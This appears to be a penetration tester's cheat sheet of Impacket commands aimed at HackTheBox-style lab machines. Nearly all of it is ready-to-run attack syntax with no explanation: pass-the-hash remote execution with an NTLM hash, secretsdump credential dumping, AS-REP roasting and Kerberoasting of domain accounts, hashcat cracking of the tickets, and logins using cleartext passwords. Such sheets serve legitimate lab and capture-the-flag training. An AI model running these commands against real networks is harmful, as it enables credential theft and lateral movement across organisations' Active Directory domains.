Impacket

Impacket-Psexec

impacket-psexec administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Impacket-Secretsdump

impacket-secretsdump htb/john@10.10.10.161

Impacket-GetADUsers

impacket-GetADUsers egotistical-bank.local/ -dc-ip 10.10.10.175 -debug
impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100

Impacket-GetNPUsers

impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
while read -r p; do GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >> hash.txt; done < unames.txt

Impacket-GetUserSPNs

Listing SPN Accounts

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100

Requesting all TGS Tickets

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request

Requesting a Single TGS ticket

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Saving the TGS Ticket to an Output File

impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

Cracking the Ticket Offline with Hashcat

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 

Impacket-Wmiexec

impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.10.10.100

Impacket-smbserver

impacket-smbserver -smb2support smb -username test -password test $(pwd)

Impacket-mssqlclient

impacket-mssqlclient -db POO_PUBLIC intranet.poo/external_user:p00Public3@10.13.38.11
